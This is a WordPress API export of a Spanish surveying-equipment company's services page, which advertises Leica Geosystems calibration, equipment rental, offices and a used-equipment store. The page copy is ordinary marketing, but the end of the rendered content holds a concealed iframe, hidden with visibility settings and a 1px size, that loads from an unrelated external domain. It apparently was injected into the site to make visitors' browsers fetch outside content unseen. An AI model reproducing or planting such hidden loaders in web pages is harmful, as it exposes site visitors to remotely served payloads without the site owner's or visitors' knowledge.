{"id":1616,"date":"2017-07-20T13:34:26","date_gmt":"2017-07-20T11:34:26","guid":{"rendered":"https:\/\/www.instop.biz\/blog\/?page_id=1616"},"modified":"2024-09-02T07:30:54","modified_gmt":"2024-09-02T06:30:54","slug":"servicios","status":"publish","type":"page","link":"https:\/\/www.instop.biz\/blog\/servicios\/","title":{"rendered":"Servicios Instop"},"content":{"rendered":"<h3><span class=\"titol_1\">INSTOP<\/span>\u00a0es una empresa de servicios orientada al campo de la topograf\u00eda y de la medida del terreno en general, con el objetivo de proporcionar al profesional de la medici\u00f3n las \u00faltimas herramientas disponibles en el mercado, a trav\u00e9s de la venta y el alquiler de las mismas.<\/h3>\n<table style=\"border-collapse: collapse; width: 100%; height: 288px;\">\n<tbody>\n<tr style=\"height: 288px;\">\n<td style=\"width: 25%; height: 288px;\"><a href=\"https:\/\/www.instop.es\/calibracion_reparacion\/calibracion_reparacion.php\"><img decoding=\"async\" src=\"https:\/\/www.instop.es\/b\/sat-2023.jpg\" \/><\/a><\/td>\n<td style=\"width: 25%; height: 288px;\"><a href=\"https:\/\/www.instop.biz\/blog\/nuevas-tarifas-alquiler-de-leica-geosystems\/\"><img decoding=\"async\" src=\"https:\/\/www.instop.es\/b\/alquiler-2023.jpg\" \/><\/a><\/td>\n<td style=\"width: 25%; height: 288px;\"><a href=\"https:\/\/www.instop.es\/instop\/oficinas-instop.php\"><img decoding=\"async\" src=\"https:\/\/www.instop.es\/b\/oficines.jpg\" \/><\/a><\/td>\n<td style=\"width: 25%; height: 288px;\"><a href=\"https:\/\/www.instop.shop\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium\" src=\"https:\/\/www.instop.es\/b\/uec.webp\" width=\"300\" height=\"180\" \/><\/a><\/td>\n<\/tr>\n<tr>\n<td style=\"width: 25%;\">\n<h2 align=\"left\"><strong>Calibraci\u00f3n<\/strong><\/h2>\n<p align=\"left\">Estamos avalados como socio de distribuci\u00f3n y <strong>servicio t\u00e9cnico oficial autorizado de Leica Geosystems<\/strong>, con un moderno laboratorio de servicio t\u00e9cnico montado por t\u00e9cnicos especializados. Nuestro personal est\u00e1 altamente formado y equipado para proporcionarle un servicio t\u00e9cnico de la m\u00e1s alta calidad en el mantenimiento, asistencia, calibrado y reparaci\u00f3n de sus equipos.<\/p>\n<\/td>\n<td style=\"width: 25%;\">\n<h2 align=\"left\"><span class=\"normal_instop\"><strong>Alquiler<\/strong><\/span><\/h2>\n<p align=\"left\"><span class=\"normal_instop\">Somos la <strong>mayor empresa de alquiler<\/strong> de estaciones motorizadas, autom\u00e1ticas y GPS en RTK centim\u00e9tricos, disponiendo tambi\u00e9n de un gran parque de instrumentos en el resto de la gama. Por todo ello INSTOP tiene la oportunidad de ofrecerles los mejores precios del mercado tanto en venta como alquiler.<\/span><\/p>\n<\/td>\n<td style=\"width: 25%;\">\n<h2 align=\"left\"><span class=\"normal_instop\"><strong>Nuestras oficinas<br \/>\n<\/strong><\/span><\/h2>\n<p align=\"left\"><span class=\"normal_instop\">Disponemos de tres oficinas equipadas con la \u00faltima tecnolog\u00eda.<\/span><\/p>\n<\/td>\n<td style=\"width: 25%;\">\n<h2 align=\"left\"><span class=\"normal_instop\"><strong>UEC<\/strong><\/span><\/h2>\n<p align=\"left\"><span class=\"normal_instop\">Disponemos de un gran parte de equipos usados, bajo el nombre de UEC (Used Equipment Centre), visite nuestra web para ver los \u00faltimos equipos disponibles.<\/span><\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2 align=\"left\"><\/h2>\n<p align=\"left\">Por nuestro conocimiento y experiencia en el campo de la topograf\u00eda y la construcci\u00f3n, comprendemos la importancia de tener una instrumentaci\u00f3n precisa y los beneficios de un mantenimiento programado.<br \/>\nPara solicitar una reparaci\u00f3n u organizar la calibraci\u00f3n o servicio, contacte con nosotros a trav\u00e9s de nuestra web <a href=\"https:\/\/www.instop.es\/calibracion_reparacion\/calibracion_reparacion.php\">www.instop.es <\/a>o tel\u00e9fono +34 93 803 9576.<\/p>\n<p class=\"normal_instop\">Somos distribuidores oficiales de <strong>Leica Geosystems<\/strong> y ofrecemos soluciones de esta firma en forma de <strong>Estaciones Totales<\/strong>, <strong>Receptores GPS<\/strong>, <strong>niveles \u00f3pticos<\/strong>, <strong>l\u00e1ser y digitales<\/strong>, <strong>teodolitos<\/strong>, etc<\/p>\n<p class=\"normal_instop\">Le invitamos a que visite el contenido de nuestra p\u00e1gina web y en caso de que necesite ampliar la informaci\u00f3n, no dude en ponerse en contacto con nosotros.<\/p>\n<ul>\n<li class=\"normal_instop\">\u00a0Venta, asesoramiento y formaci\u00f3n<\/li>\n<li class=\"normal_instop\"><a href=\"https:\/\/www.instop.es\/alquiler\/alquiler-topografia.php\">Alquiler de equipos topogr\u00e1ficos<\/a><\/li>\n<li class=\"normal_instop\"><a href=\"https:\/\/www.instop.es\/calibracion_reparacion\/calibracion_reparacion.php\">Servicio t\u00e9cnico oficial autorizado de Leica Geosystems<\/a><\/li>\n<li class=\"normal_instop\">Accesorios y consumibles en 24-48 horas<\/li>\n<\/ul>\n<p><img decoding=\"async\" src=\"https:\/\/www.instop.es\/instop\/i\/diagrama-instop-32-2021.jpg\" \/><\/p>\n<p>&nbsp;<\/p>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n","protected":false},"excerpt":{"rendered":"<p>INSTOP\u00a0es una empresa de servicios orientada al campo de la topograf\u00eda y de la medida del terreno en general, con [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"site-container-style":"default","site-container-layout":"default","site-sidebar-layout":"default","disable-article-header":"default","disable-site-header":"default","disable-site-footer":"default","disable-content-area-spacing":"default","footnotes":""},"class_list":["post-1616","page","type-page","status-publish","hentry"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.instop.biz\/blog\/wp-json\/wp\/v2\/pages\/1616","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.instop.biz\/blog\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.instop.biz\/blog\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.instop.biz\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.instop.biz\/blog\/wp-json\/wp\/v2\/comments?post=1616"}],"version-history":[{"count":16,"href":"https:\/\/www.instop.biz\/blog\/wp-json\/wp\/v2\/pages\/1616\/revisions"}],"predecessor-version":[{"id":3934,"href":"https:\/\/www.instop.biz\/blog\/wp-json\/wp\/v2\/pages\/1616\/revisions\/3934"}],"wp:attachment":[{"href":"https:\/\/www.instop.biz\/blog\/wp-json\/wp\/v2\/media?parent=1616"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}